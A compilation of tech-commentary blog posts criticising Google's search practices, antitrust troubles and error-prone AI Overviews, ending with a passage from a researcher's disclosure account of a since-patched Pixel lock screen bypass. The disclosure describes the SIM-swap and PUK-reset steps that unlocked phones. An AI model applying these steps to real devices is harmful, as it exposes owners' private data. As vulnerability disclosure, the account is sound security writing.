
Google’s iOS App Inserts Its Own Links Into Webpages

By: Nick Heer
1 December 2024 at 17:17

Barry Schwartz, Search Engine Roundtable:

Google launched a new feature in the Google App for iOS named Page Annotation. When you are browsing a web page in the Google App native browser, Google can “extract interesting entities from the webpage and highlight them in line.” When you click on them, Google takes you to more search results.

This was announced nearly two weeks ago in a subtle forum post. If there was a press release, I cannot find it. It was only picked up by the press thanks to Schwartz’s November 21 article, but those stories were not published until just before the U.S. Thanksgiving long weekend, so this news was basically buried.

Google is now injecting “Page Annotations”, which are kind of like Skimlinks but with search results. The results from a tapped Page Annotation are loaded in a floating temporary sheet, so it is not like users are fully whisked away — but that is almost worse. In the illustration from Google, a person is apparently viewing a list of Japanese castles, into which Google has inserted a link on “Osaka Castle”. Tapping on an injected link will show Google’s standard search results, which are front-loaded with details about how to contact the castle, buy tickets, and see a map. All of those things would be done better in a view that cannot be accidentally swiped away.

Maybe, you are thinking, it would be helpful to easily trigger a search from some selected text, and that is fair. But the Google app already displays a toolbar with a search button when you highlight any text in this app.

Owners of web properties can opt out only by completing a Google Form, and they must be signed in to the same Google account they use for Search Console. Also, if a property is accessible at multiple URLs — for example, http and https, or www and non-prefixed — each variation must be submitted separately.
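To illustrate the chore involved, a property reachable over both schemes, with and without the www prefix, requires four separate submissions. Here is a minimal sketch; the helper function and the property name are hypothetical:

```python
from itertools import product

def property_variants(host: str) -> list[str]:
    """Enumerate the scheme and www variations of a property,
    each of which would need to be submitted separately."""
    schemes = ["http", "https"]
    hosts = [host, f"www.{host}"]
    return [f"{scheme}://{h}/" for scheme, h in product(schemes, hosts)]

# A hypothetical property, reachable under four URL variations:
print(property_variants("example.com"))
```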

For Google to believe it has the right to inject itself into third-party websites is pure arrogance, yet it is nothing new for the company. It has long approached the web as its own platform over which it has control and ownership. It overlays dialogs without permission; it invented a proprietary fork of HTML and it pushed its adoption for years. It can only do these things because it has control over how people use the web.

⌥ Permalink

Competition Bureau Sues Google for Anti-Competitive Conduct

By: Nick Heer
28 November 2024 at 23:31

Competition Bureau Canada:

The Competition Bureau is taking legal action against Google for anti-competitive conduct in online advertising technology services in Canada. Following a thorough investigation, the Bureau has filed an application with the Competition Tribunal that seeks to remedy the conduct for the benefit of Canadians.

This has become a familiar announcement: a consumer protection agency, somewhere in the world, is questioning whether a giant technology conglomerate has abused its power. A dam has burst.

⌥ Permalink

Mozilla Is Worried About the Proposed Fixes for Google’s Search Monopoly

By: Nick Heer
27 November 2024 at 00:46

Michael Kan, PC Magazine:

Mozilla points to a key but less eye-catching proposal from the DOJ to regulate Google’s search business, which a judge ruled as a monopoly in August. In their recommendations, federal prosecutors urged the court to ban Google from offering “something of value” to third-party companies to make Google the default search engine over their software or devices. 

“The proposed remedies are designed to end Google’s unlawful practices and open up the market for rivals and new entrants to emerge,” the DOJ told the court. The problem is that Mozilla earns most of its revenue from royalty deals — nearly 86% in 2022 — making Google the default Firefox browser search engine.

This is probably another reason why U.S. prosecutors want to jettison Chrome from Google: they want to reduce any benefit it may accrue from trying to fix its illegal search monopoly. But it seems Google’s position in the industry is so entrenched that correcting it will hurt lots of other businesses, too. That does not mean it should not be broken up or that the DOJ’s proposed remedies are wrong, however.

⌥ Permalink

Mozilla Might Suffer the Gravest Consequences of the Google Antitrust Ruling

By: Nick Heer
7 August 2024 at 23:38

Alfonso Maruccia, TechSpot:

Its most recent financials show Mozilla gets $510 million out of its $593 million in total revenue from its Google partnership. This precarious financial position is a side effect of its deal with Alphabet, which made Google the search engine default for newer Firefox installations.

Jason Del Rey, Fortune:

Mozilla is putting on a brave face for now, and not directly addressing the existential threat that the ruling appears to pose.

“Mozilla has always championed competition and choice online, particularly in search,” a spokesperson said in a statement to Fortune on Monday. “We’re closely reviewing the court’s decision, considering its potential impact on Mozilla and how we can positively influence the next steps… Firefox continues to offer a range of search options, and we remain committed to serving our users’ preferences while fostering a competitive market.”

It is possible Mozilla will not be impacted by remedies to Google’s illegal monopoly, the details of which will begin to take shape next month. But it also seems possible Mozilla could lose virtually all of its revenue, destabilizing the organization behind one of the few non-Chromium browsers and the best documentation of web technologies available anywhere.

Trying to untangle an illegal monopolist is necessarily difficult. This will be a long and painful process for everyone. The short-term resolutions might be ineffectual and irritating, and they may not change Google’s market position. But it is important to get on the record that Google has engaged in illegal conduct to protect its dominance, and so it will be subjected to new oversight and scrutiny. This exercise is worth it because there ought to be limits to market power and anticompetitive behaviour.

⌥ Permalink

⌥ The Reddit and Google Pairing Is One of a Kind

By: Nick Heer
7 August 2024 at 03:51

Since owners of web properties became aware of the traffic-sending power of search engines — Google, in most places — they have been in an increasingly uncomfortable relationship as search moves beyond ten relevant links on a page. Google does not need websites, per se; it needs the information they provide. Its business recommendations are powered in part by reviews on other websites. Answers to questions appear in snippets, sourced to other websites, without the user needing to click away.

Publishers and other website owners might consider this a bad deal. They feed Google all this information hoping someone will visit their website, but Google is adding features that make it less likely they will do so. Unless they were willing to risk losing all their Google search traffic, there was little a publisher could do. Individually, they needed Google more than Google needed them.

But that has not been quite as true for Reddit. Its discussions hold a uniquely large corpus of suggestions and information on specific topics and in hyper-local contexts, as well as a whole lot of trash. While the quality of Google’s results has been sliding, searchers discovered they could append “Reddit” to a query to find what they were looking for.

Google realized this and, earlier this year, signed a $60 million deal with Reddit allowing it to scrape the site to train its A.I. features. Part of that deal apparently involved indexing pages in search as, last month, Reddit restricted that capability to Google. That is: if you want to search Reddit, you can either use the site’s internal search engine, or you can use Google. Other search engines still display results created from before mid-July, according to 404 Media, but only Google is permitted to crawl anything newer.

It is unclear to me whether this is a deal only available to Google, or if it is open to any search engine that wants to pay. Even if it was intended to be exclusive, I have a feeling it might not be for much longer. But it seems like something Reddit would only care about doing with Google because other search engines basically do not matter in the United States or worldwide.1 What amount of money do you think Microsoft would need to pay for Bing to be the sole permitted crawler of Reddit in exchange for traffic from its measly market share? I bet it is a lot more than $60 million.

Maybe that is one reason this agreement feels uncomfortable to me. Search engines are marketed as finding results across the entire web but, of course, that is not true: they most often obey rules declared in robots.txt files, and they do not necessarily index everything they are able to, either. But those limits are voluntary conventions, not commercial arrangements. It feels like a violation of the premise of a search engine for crawling and linking to become something that must be paid for. The whole thing about the web is that the links are free. There is no guarantee the actual page will be freely accessible, but the link itself is not restricted. That is the central problem with link tax laws, and this pay-to-index scheme is similarly restrictive.
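Those crawler rules are conventionally declared in a robots.txt file, which Python’s standard library can evaluate. A hypothetical policy in the spirit of this arrangement, permitting one named crawler and excluding every other agent, might look like this; the URLs are placeholders:

```python
from urllib import robotparser

# A hypothetical robots.txt in the spirit of the policy described:
# one named crawler is allowed in, every other agent is excluded.
ROBOTS_TXT = """\
User-agent: Googlebot
Allow: /

User-agent: *
Disallow: /
"""

parser = robotparser.RobotFileParser()
parser.parse(ROBOTS_TXT.splitlines())

print(parser.can_fetch("Googlebot", "https://example.com/r/some-thread"))  # True
print(parser.can_fetch("Bingbot", "https://example.com/r/some-thread"))    # False
```

Note this only expresses the crawl policy; it says nothing about results other engines may keep serving from pages crawled before the rule changed.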

This is, of course, not the first time there has been tension in how a site balances search engine visibility and its own goals. Publishers have, for years, weighed their desire to be found by readers against login requirements and paywalls — guided by the overwhelming influence of Google.

Google used to require that publishers provide free articles in order to be indexed by the search engine but, in 2017, it replaced that policy with a more flexible model. Instead of being forced to offer a certain number of free page views, publishers are now able to provide Google with indexable data.

Then there are partnerships struck by search engines and third parties to obtain specific kinds of data. These were summarized well in the recent United States v. Google decision (PDF), and they are probably closest in spirit to this Reddit deal:

GSEs enter into data-sharing agreements with partners (usually specialized vertical providers) to obtain structured data for use in verticals. Tr. at 9148:2-5 (Holden) (“[W]e started to gather what we would call structured data, where you need to enter into relationships with partners to gather this data that’s not generally available on the web. It can’t be crawled.”). These agreements can take various forms. The GSE might offer traffic to the provider in exchange for information (i.e., data-for-traffic agreements), pay the provider revenue share, or simply compensate the provider for the information. Id. at 6181:7-18 (Barrett-Bowen).

As of 2020, Microsoft has partnered with more than 100 providers to obtain structured data, and those partners include information sources like Fandango, Glassdoor, IMDb, Pinterest, Spotify, and more. DX1305 at .004, 018–.028; accord Tr. at 6212:23–6215:10 (Barrett-Bowen) (agreeing that Microsoft partners with over 70 providers of travel and local information, including the biggest players in the space).

The government attorneys said Bing is required to pay for structured data owing to its smaller size, while Google is able to obtain structured data for free because it sends partners so much traffic. The judge ultimately rejected their argument that Microsoft struggled to sign these agreements or was impeded in doing so, but he did not dispute the difference in negotiating power between the two companies.

Once more, for emphasis: Google usually gets structured data for free but, in this case, it agreed to pay $60 million; imagine how much it would cost Bing.

This agreement does feel pretty unique, though. It is hard for me to imagine many other websites with the kind of specific knowledge found aplenty on Reddit. It is a centralized version of the bulletin boards of the early 2000s for such a wide variety of interests and topics. It is such a vast user base that, while it cannot ignore Google referrals, it is not necessarily reliant on them in the same way as many other websites are.

Most other popular websites are insular social networks; Instagram and TikTok do not rely on Google referrals. Wikipedia would probably be the best comparison to Reddit in terms of the contribution it makes to the web — even greater, I think — but every page I tried except the homepage is overwhelmingly dependent on external search engine traffic.

Meanwhile, pretty much everyone else still has to pay Google for visitors. They have to buy the ads sitting atop organic search results. They have to buy ads on maps, on shopping carousels, on videos. People who operate websites hope they will get free clicks, but many of them know they will have to pay for some of them, even though Google will happily lift and summarize their work without compensation.

I cannot think of any other web property which has this kind of leverage over Google. While this feels like a violation of the ideals and principles that have built the open web on which Google has built its empire, I wonder if Google will make many similar agreements, if any. I doubt it — at least for now. This feels funny; maybe that is why it is so unique, and why it is not worth being too troubled by it.


  1. The uptick of Bing in the worldwide chart appears to be, in part, thanks to a growing share in China. Its market share has also grown a little in Africa and South America, but only by tiny amounts. However, Reddit is blocked in China, so a deal does not seem particularly attractive to either party. ↥︎

‘Google Is a Monopolist’ in Search Says U.S. Judge

By: Nick Heer
5 August 2024 at 21:36

Ashley Belanger, Ars Technica:

Google just lost a massive antitrust trial over its sprawling search business, as US district judge Amit Mehta released his ruling, showing that he sided with the US Department of Justice in the case that could disrupt how billions of people search the web.

“Google is a monopolist, and it has acted as one to maintain its monopoly,” Mehta wrote in his opinion. “It has violated Section 2 of the Sherman Act.”

Google will surely contest this finding once its implications are known; Mehta has not yet announced what remedies will be imposed on Google.

The opinion is full of details about the precise nature of how Google search and its ads work together, Google’s relationship with Apple and other third parties, and how its business has changed over time. For example, the judge notes Google adjusted ad pricing to maintain a specific growth target, and increased it incrementally to mask it in the typical fluctuations of ad costs. He also cites a finding that “thirteen months of user data acquired by Google is equivalent to over 17 years of data on Bing” in informing the quality of search results. Meanwhile, Google pays Apple a redacted amount through its revenue sharing agreement for default placement in Safari, and it pays for searches performed through Chrome on Apple devices as well. There is a lot more in here, and I fully intend on re-reading the opinion with a bunch of questions I have in mind.

Google really does have great search results a lot of the time, even though it has stumbled in recent years. DuckDuckGo is my default but I find myself often turning to Google for local results, very old results, and news. (DuckDuckGo is powered by Bing, which prioritizes MSN-syndicated versions of articles that I do not want.) Google has not fallen into the same trap as Bing by wholly cluttering the results page. Microsoft still has no taste.

But two things can be true: Google can be the best search engine for most people, most of the time, because it is very good; and, also, Google can have abused its market-leading position to avoid competition and maintain its advertising revenue. Those are not inconsistent with each other. In fact, per the judge’s citation of how long it would take for Bing to amass the same information about user activity as Google does in a year, it is fully possible its quality and its dominance are related, something the judge nods toward. Google’s position is now so entrenched that “it would not lose search revenue if it were to significantly reduce the quality of its search product”.

Notably, Mehta did not sanction Google for failing to preserve evidence in the case, writing:

On the request for sanctions, the court declines to impose them. Not because Google’s failure to preserve chat messages might not warrant them. But because the sanctions Plaintiffs request do not move the needle on the court’s assessment of Google’s liability. […]

In cases where the judge found evidence of monopolistic and abusive behaviour, the lack of supporting text messages and other communications would not have made a difference; this is also true, the judge says, for his finding of a lack of anticompetitive behaviour in SA360.

⌥ Permalink

Cool URLs Mean Something

By: Nick Heer
1 August 2024 at 03:55

Tim Berners-Lee in 1998:

Keeping URIs so that they will still be around in 2, 20 or 200 or even 2000 years is clearly not as simple as it sounds. However, all over the Web, webmasters are making decisions which will make it really difficult for themselves in the future. Often, this is because they are using tools whose task is seen as to present the best site in the moment, and no one has evaluated what will happen to the links when things change. The message here is, however, that many, many things can change and your URIs can and should stay the same. They only can if you think about how you design them.

Jay Hoffmann:

Links give greater meaning to our webpages. Without the link, we would lose this significant grammatical tool native to the web. And as links die out and rot on the vine, what’s at stake is our ability to communicate in the proper language of hypertext.

A dead link may not seem like it means very much, even in the aggregate. But they are. One-way links, the way they exist on the web where anyone can link to anything, is what makes the web universal. In fact, the first name for URL’s was URI’s, or Universal Resource Identifier. It’s right there in the name. And as Berners-Lee once pointed out, “its universality is essential.”

In 2018, Google announced it was deprecating its URL shortener, with no new links being created after March 2019. All existing shortened links would, however, remain active. It announced this in a developer blog post which — no joke — returns a 404 error at its original URL, which I found via 9to5Google. Google could not bother to redirect posts from just six years ago to their new valid URLs.

Google’s URL shortener was in the news again this month because the company has confirmed it will turn off these links in August 2025 except for those created via Google’s own apps. Google Maps, for example, still creates a goo.gl short link when sharing a location.

In principle, I support this deprecation because it is confusing and dangerous for Google’s own shortened URLs to share a domain with ones created by third-party users. But this is a Google-created problem because it designed its URLs poorly. It should never have been possible for anyone else to create links with the same URL shortener used by Google itself. Yet, while it feels appropriate for a Google service to be unreliable over the long term, it should not be ending access to links that may have been created as recently as five years ago.
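The namespace problem described here is easy to sketch. In this hypothetical design, first-party and user-created links carry distinct slug prefixes, so one class can be retired without breaking the other; the prefixes, domain, and in-memory store are all illustrative:

```python
# Hypothetical short-link store: first-party links and user-created
# links get distinct slug prefixes, so retiring one class of links
# cannot break the other.
SHORT_LINKS: dict[str, str] = {}

def shorten(url: str, first_party: bool) -> str:
    """Create a short link, namespaced by who created it."""
    prefix = "g" if first_party else "u"
    slug = f"{prefix}{len(SHORT_LINKS):04x}"
    SHORT_LINKS[slug] = url
    return f"https://short.example/{slug}"

def retire_user_links() -> None:
    """Turn off third-party links; first-party links keep resolving."""
    for slug in [s for s in SHORT_LINKS if s.startswith("u")]:
        del SHORT_LINKS[slug]
```

Under a scheme like this, a 2025 shutdown of user-created links would not need to touch the links Google’s own apps still generate.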

By the way, the Sophos link on the word “dangerous” in that last paragraph? I found it via a ZDNet article where the inline link is — you guessed it — broken. Sophos also could not bother to redirect this URL from 2018 to its current address. Six years ago! Link rot is a scourge.

⌥ Permalink

Third-Party Cookies Have Got to Go

By: Nick Heer
30 July 2024 at 02:26

Anthony Chavez, of Google:

[…] Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web browsing, and they’d be able to adjust that choice at any time. We’re discussing this new path with regulators, and will engage with the industry as we roll this out.

Oh good — more choices.

Hadley Beeman, of the W3C’s Technical Architecture Group:

Third-party cookies are not good for the web. They enable tracking, which involves following your activity across multiple websites. They can be helpful for use cases like login and single sign-on, or putting shopping choices into a cart — but they can also be used to invisibly track your browsing activity across sites for surveillance or ad-targeting purposes. This hidden personal data collection hurts everyone’s privacy.

All of this data collection only makes sense to advertisers in the aggregate, but it only works because of specifics: specific users, specific webpages, and specific actions. Privacy Sandbox is imperfect but Google could have moved privacy forward by ending third-party cookies in the world’s most popular browser.

⌥ Permalink

⌥ Anti Trust in Tech

By: Nick Heer
7 June 2024 at 22:02

If you had just been looking at the headlines from major research organizations, you would see a lack of confidence from the public in big business, technology companies included. For years, poll after poll from around the world has found high levels of distrust in their influence, handling of private data, and new developments.

If these corporations are at all worried about this, they are not showing it in their products — particularly the A.I. stuff they have been shipping. There has been little attempt at abating last year’s trust crisis. Google decided to launch overconfident summaries for a variety of search queries. Far from helping to sift through all that has ever been published on the web and mash together a representative summary, the feature was an embarrassing mess that made the company look ill-prepared for the concept of satire. Microsoft announced a product which records and interprets everything you do and see on your computer, and framed it as a good thing.

Can any of them see how this looks? If not — if they really are that unaware — why should we turn to them to fill gaps and needs in society? I certainly would not wish to indulge businesses which see themselves as entirely separate from the world.

It is hard to imagine they do not, though. Sundar Pichai, in an interview with Nilay Patel, recognised there were circumstances in which an A.I. summary would be inappropriate, and cautioned that the company still considers it a work in progress. Yet Google still turned it on by default in the U.S. with plans to expand worldwide this year.

Microsoft has responded to criticism by promising Recall will now be a feature users must opt into, rather than something they must turn off after updating Windows. The company also says there are more security protections for Recall data than originally promised but, based on its track record, maybe do not get too excited yet.

These product introductions all look like hubris. Arrogance, really — recognition of the significant power these corporations wield and the lack of competition they face. Google can poison its search engine because where else are most people going to go? How many people would turn off Recall, something which requires foreknowledge of its existence, under Microsoft’s original rollout strategy?

It is more or less an admission they are all comfortable gambling with their customers’ trust to further the perception they are at the forefront of the new hotness.

None of this is a judgement on the usefulness of these features or their social impact. I remain perplexed by the combination of a crisis of trust in new technologies, and the unwillingness of the companies responsible to engage with the public. There seems to be little attempt at persuasion. Instead, we are told to get on board because this rocket ship is taking off with or without us. Concerned? Too bad: the rocket ship is shaped like a giant middle finger.

What I hope we see Monday from Apple — a company which has portrayed itself as more careful and practical than many of its contemporaries — is a recognition of how this feels from outside the industry. Expect “A.I.” to be repeated in the presentation until you are sick of those two letters; investors are going to eat it up. When normal people update their phones in September, though, they should not feel like they are being bullied into accepting our A.I. future.

People need to be given time to adjust and learn. If the polls are representative, very few people trust giant corporations to get this right — understandably — yet these tech companies seem to believe we are as enthusiastic about every change they make as they are. Sorry, we are not, no matter how big a smile a company representative is wearing when they talk about it. Investors may not be patient but many of the rest of us need time.

Google Comments on Its Sloppy Summaries

By: Nick Heer
3 June 2024 at 04:20

Liz Reid, head of Google Search, on the predictably bizarre results of rolling out its “A.I. Overviews” feature:

One area we identified was our ability to interpret nonsensical queries and satirical content. Let’s take a look at an example: “How many rocks should I eat?” Prior to these screenshots going viral, practically no one asked Google that question. You can see that yourself on Google Trends.

There isn’t much web content that seriously contemplates that question, either. This is what is often called a “data void” or “information gap,” where there’s a limited amount of high quality content about a topic. However, in this case, there is satirical content on this topic … that also happened to be republished on a geological software provider’s website. So when someone put that question into Search, an AI Overview appeared that faithfully linked to one of the only websites that tackled the question.

This reasoning sounds almost circular in the context of what A.I. answers are supposed to do. Google loves demonstrating how users can enter a query like “suggest a 7 day meal plan for a college student living in a dorm focusing on budget friendly and microwavable meals” and see a grouped set of responses synthesized from a variety of sources. That is surely a relatively uncommon query. I was going to prove that in the same way Reid did, but when I enter it in Google Trends, I get a 400 error. Even a shortened version is searched so rarely it has no data.

The organic, non-A.I. search results for the long query are plentiful but do not exactly fulfill its specific criteria. Most of the links I saw are not microwave-only, or are simple lists not grouped into particular meal types. Nothing I could find specifically answers the question posed. In order to fulfill the query in the demo video, Google’s search engine has to look through everything it knows and find meals which cook in a microwave, and organize them into a daily plan of different meal types.

But Google is also blaming the novelty of the rocks query, and the satirical information directly answering it, for the failure of its A.I. features. In other words, it wants to say the cool thing about its A.I. stuff is that it can handle unpopular or new queries by sifting through the web and merging together a bunch of what it finds. The bad thing about its A.I. stuff, it turns out, is basically the same.

Benj Edwards, Ars Technica:

Here we see the fundamental flaw of the system: “AI Overviews are built to only show information that is backed up by top web results.” The design is based on the false assumption that Google’s page-ranking algorithm favors accurate results and not SEO-gamed garbage. Google Search has been broken for some time, and now the company is relying on those gamed and spam-filled results to feed its new AI model.

Reid says Google has made a bunch of changes to address the issues raised, but none of them addresses the fundamental shift that A.I. results represent. Google used to be a directory — admittedly one ranked by mysterious criteria — allowing users to decide which results best fit their needs. It has slowly repositioned itself as answering their queries with authority. Its A.I. answers are a fuller realization of features like Featured Snippets and the Answer Box. That is: instead of seeing options which may match their query, Google is now giving searchers singular answers. It has transformed from a referrer into an omniscient responder.

⌥ Permalink

Google Leaked Itself

By: Nick Heer
29 May 2024 at 14:52

Rand Fishkin, writing on the SparkToro blog:

On Sunday, May 5th, I received an email from a person claiming to have access to a massive leak of API documentation from inside Google’s Search division. The email further claimed that these leaked documents were confirmed as authentic by ex-Google employees, and that those ex-employees and others had shared additional, private information about Google’s search operations.

It seems this vast amount of information was published erroneously by Google to a GitHub repository in March, and then removed earlier this month. As Fishkin writes, it is evidence Google has been dishonest in its public statements about how Google Search works.

Fishkin specifically calls attention to media outlets that cover search engines and value the word of Google’s spokespeople. This has been a clever play by Google for years: because its specific ranking criteria have not been publicly known, it can confirm or deny rumours without having to square them with what the evidence shows.

Google’s ranking system seems to be biased in favour of larger businesses and more established websites, according to Fishkin’s analysis. This is not surprising. I am wondering how this fits with the declining quality of Google search results as small, highly-optimized pages full of machine-generated junk seem to rise to the top.

Mike King, iPullRank:

You’d be tempted to broadly call these “ranking factors,” but that would be imprecise. Many, even most, of them are ranking factors, but many are not. What I’ll do here is contextualize some of the most interesting ranking systems and features (at least, those I was able to find in the first few hours of reviewing this massive leak) based on my extensive research and things that Google has told/lied to us about over the years.

“Lied” is harsh, but it’s the only accurate word to use here. While I don’t necessarily fault Google’s public representatives for protecting their proprietary information, I do take issue with their efforts to actively discredit people in the marketing, tech, and journalism worlds who have presented reproducible discoveries. My advice to future Googlers speaking on these topics: Sometimes it’s better to simply say “we can’t talk about that.” Your credibility matters, and when leaks like this and testimony like the DOJ trial come out, it becomes impossible to trust your future statements.

One of the things potentially tracked by Google for search purposes is Chrome browsing data, something Google has denied. The variable in question — chromeInTotal — and the minimal description offered — “site-level Chrome views” — seem open to interpretation. Perhaps this is only recorded in some circumstances, or it depends on user preferences, or is not actually part of search rankings, or is entirely unused. But it certainly suggests aggregate website visits in Chrome, the world’s most popular web browser, are used to inform rankings without users’ knowledge.

Update: Google says the leaked documents are real, but warns “against making inaccurate assumptions”. In fairness, I would like to make more accurate assumptions.

⌥ Permalink

Google’s A.I. Answers Said to Put Glue in Pizza, So Katie Notopoulos Made Some Pizza

By: Nick Heer
25 May 2024 at 05:53

Jason Koebler, 404 Media:

The complete destruction of Google Search via forced AI adoption and the carnage it is wreaking on the internet is deeply depressing, but there are bright spots. For example, as the prophecy foretold, we are learning exactly what Google is paying Reddit $60 million annually for. And that is to confidently serve its customers ideas like, to make cheese stick on a pizza, “you can also add about 1/8 cup of non-toxic glue” to pizza sauce, which comes directly from the mind of a Reddit user who calls themselves “Fucksmith” and posted about putting glue on pizza 11 years ago.

Katie Notopoulos, putting the “business” in Business Insider:

I knew my assignment: I had to make the Google glue pizza. (Don’t try this at home! I risked myself for the sake of the story, but you shouldn’t!)

My timeline on three entirely separate social networks — Bluesky, Mastodon, and Threads — has been chock full of examples of Google’s A.I. answers absolutely eating dirt — or, in one case, rocks — in the face of obvious satire and shitposting. Well, obvious to us. Computers, it seems, have not figured out glue and gasoline are bad for food.

The A.I. answers from Google are not all yucks and chuckles, unfortunately.

Nic Lake:

Yesterday (Part 1) I saw that mushrooms post, and knew something like that was going to get people hurt. I didn’t really think that (CONTENT WARNING) asking how best to deal with depression was going to be next on the “shit I didn’t want to see” Bingo card.

The organizations know. They know that these tools are not ready. They call it a “beta” and feed it to you anyway.

Google is manually removing A.I. results where appropriate, and it is claiming some of the screenshots which have been circulating have been faked in some way, though it has not specified which.

To quote week-ago me:

Given the sliding quality of Google’s results, it seems quite bold for the company to be confident users worldwide will trust its generated answers.

Quite bold, indeed.

I do not expect perfection, but it is downright embarrassing that Google rolled out a product so unreliable and occasionally dangerous that it continues to tarnish an already suffering reputation. Google’s Featured Snippets were bad enough. Now it is in the process of rolling out a whole new level of overconfident nonsense to the entire world, fixing it as everyone tests its limits.

⌥ Permalink

Google Is Expanding A.I. Feature Availability in Search

By: Nick Heer
15 May 2024 at 04:39

Liz Reid, head of Google Search:

People have already used AI Overviews billions of times through our experiment in Search Labs. They like that they can get both a quick overview of a topic and links to learn more. We’ve found that with AI Overviews, people use Search more, and are more satisfied with their results.

So today, AI Overviews will begin rolling out to everyone in the U.S., with more countries coming soon. That means that this week, hundreds of millions of users will have access to AI Overviews, and we expect to bring them to over a billion people by the end of the year.

Given the sliding quality of Google’s results, it seems quite bold for the company to be confident users worldwide will trust its generated answers. I am curious to try it when it is eventually released in Canada.

I know what you must be thinking: if Google is going to generate results without users clicking around much, how will it sell ad space? It is a fair question, reader.

Gerrit De Vynck and Cat Zakrzewski, Washington Post:

Google has largely avoided AI answers for the moneymaking searches that host ads, said Andy Taylor, vice president of research at internet marketing firm Tinuiti.

When it does show an AI answer on “commercial” searches, it shows up below the row of advertisements. That could force websites to buy ads just to maintain their position at the top of search results.

This is just one source speaking to the Post. I could not find any corroborating evidence or a study to support this, even on Tinuiti’s website. But I did notice — halfway through Google’s promo video — a query for “kid friendly places to eat in dallas” was answered with an ad for Hopdoddy Burger Bar before any clever A.I. stuff was shown.

Obviously, the biggest worry for many websites dependent on Google traffic is what will happen to referrals if Google will simply summarize the results of pages instead of linking to them. I have mixed feelings about this. There are many websites which game search results and overwhelm queries with their own summaries. I would like to say “good riddance”, but I also know these pages did not come out of nowhere. They are a product of trying to improve website rankings on Google for all searches, and to increase ad and affiliate revenue from people who have clicked through. Neither one is a laudable goal in its own right. Yet anyone who has paid attention to the media industry for more than a minute can kind of understand these desperate attempts to grab attention and money.

Google built entire industries, from recipe bloggers to search optimization experts. What happens when it blows it all up?

Good thing home pages are back.

⌥ Permalink

Accidental $70k Google Pixel Lock Screen Bypass

10 November 2022 at 11:00

I found a vulnerability affecting seemingly all Google Pixel phones where if you gave me any locked Pixel device, I could give it back to you unlocked. The bug just got fixed in the November 5, 2022 security update.

The issue allowed an attacker with physical access to bypass the lock screen protections (fingerprint, PIN, etc.) and gain complete access to the user’s device. The vulnerability is tracked as CVE-2022-20465 and it might affect other Android vendors as well. You can find my patch advisory and the raw bug report I have sent to Google at feed.bugs.xdavidhu.me.

Chapter 1:
forgetting my SIM PIN

I’m really glad that this bug is getting fixed now. This was the most impactful vulnerability that I have found yet, and it crossed a line for me where I really started to worry about the fix timeline and even just about keeping it as a “secret” myself. I might be overreacting, but I mean not so long ago the FBI was fighting with Apple for almost the same thing.

I found this bug after 24 hours of travelling. Arriving home, my Pixel 6 was on 1% battery. I was in the middle of sending a series of text messages when it died. I think it was some sort of joke that I couldn’t properly finish, so it felt pretty awkward. I rushed to the charger and booted the phone back up.

The Pixel started up and asked for the SIM’s PIN code. I usually knew it, but this time I couldn’t remember it correctly. I was hoping I might figure it out so I tried a few combinations, but I ended up entering 3 incorrect PINs, and the SIM card locked itself. It now needed the PUK code to unlock and work again.

After jumping into my closet and somehow finding the SIM’s original packaging, I scratched off the back and got the PUK code. I entered the PUK code on the Pixel and it asked me to set a new PIN. I did it, and after successfully finishing this process, I ended up on the lock screen. But something was off:

The unusual fingerprint icon and “Pixel is starting…” text

It was a fresh boot, and instead of the usual lock icon, the fingerprint icon was showing. It accepted my finger, which should not happen, since after a reboot, you must enter the lock screen PIN or password at least once to decrypt the device.

After accepting my finger, it got stuck on a weird “Pixel is starting…” message, and stayed there until I rebooted it again.

I mentally noted that this was weird and that this might have some security implications so I should look at it later. To be honest I don’t really like finding behaviors like this when I am not looking for them explicitly, because when this happens, I am prone to feeling obsessively responsible to investigate. I start to feel like I must make sure that there is no serious issue under the hood that others missed. In this case, well, there was.

Chapter 2:
what just happened?

As I promised myself, I started looking at this behavior again the next day. After rebooting the phone, putting in the incorrect PIN 3 times, entering the PUK, and choosing a new PIN, I got to the same “Pixel is starting…” state.

I played with this process multiple times, and one time I forgot to reboot the phone, and just started from a normal unlocked state, locked the device, hot-swapped the SIM tray, and did the SIM PIN reset process. I didn’t even realize what I was doing.

As I did before, I entered the PUK code and chose a new PIN. This time the phone glitched, and I was on my personal home screen. What? It was locked before, right?

This was disturbingly weird. I did it again. Lock the phone, re-insert the SIM tray, reset the PIN… And again I am on the home screen. WHAT?

My hands started to shake at this point. WHAT THE F**K? IT UNLOCKED ITSELF?

After I calmed down a little bit, I realized that indeed, this was a god damn full lock screen bypass, on the fully patched Pixel 6. I got my old Pixel 5 and tried to reproduce the bug there as well. It worked too.

Here is the unlock process in action:

Since the attacker could just bring his/her own PIN-locked SIM card, nothing other than physical access was required for exploitation. The attacker could just swap the SIM in the victim’s device, and perform the exploit with a SIM card that had a PIN lock and for which the attacker knew the correct PUK code.

Chapter 3:
Google’s response

I sent in the report. It was I think the shortest report of mine yet. Only took 5 simple steps.

Google (more precisely the Android VRP) triaged & filed an internal bug within 37 minutes. That was really impressive. Unfortunately, after this, the quality and the frequency of the responses started to deteriorate.

During the life of this bug, since the official bug ticket was not too responsive, I sometimes got some semi-official information from Googlers. I actually prefer to only get updates on the official channel, which is the bug ticket and which I can disclose, but since I was talking with some employees, I picked up on bits and pieces.

Also, it’s worth mentioning here that before reporting, I checked the Android VRP reward table which states that if you report a lock screen bypass that would affect multiple or all [Pixel] devices, you can get a maximum of $100k bounty. Since I ticked all of the required boxes, I sort of went into this thinking that this bug has a strong chance of actually getting rewarded $100k.

After it got triaged, there was basically a month of silence. I heard that it might actually be closed as a duplicate. Apparently somebody already reported it beforehand, even though it was my report that actually made them take action. Something seemingly went wrong with processing the original report. Indeed, 31 days after reporting, I woke up to the automated email saying that “The Android Security Team believes that this is a duplicate of an issue previously reported by another external researcher.” This was a bit of a signature bug bounty moment, a bug going from $100k to $0. I couldn’t really do anything but accept the fact that this bug was now a duplicate and would not pay.

Almost two months had passed since my report, and there was just silence. On day 59 I pinged the ticket, asking for a status update. I got back a template response saying that they were still working on the fix.

Fast forward to September, three months after my report. I was in London, attending Google’s bug hunter event called ESCAL8. The September 2022 patch just came out, I updated my phone and one night in my hotel room I tried to reproduce the bug. I was hoping that they might have fixed it already. No. I was still able to unlock the phone.

This hotel room incident really freaked me out. I felt like I worry and care so much more about the bug getting fixed than Google themselves. Which should not be the case. Even if I am overreacting. So that night I started reaching out to other Googlers who were at the event with us.

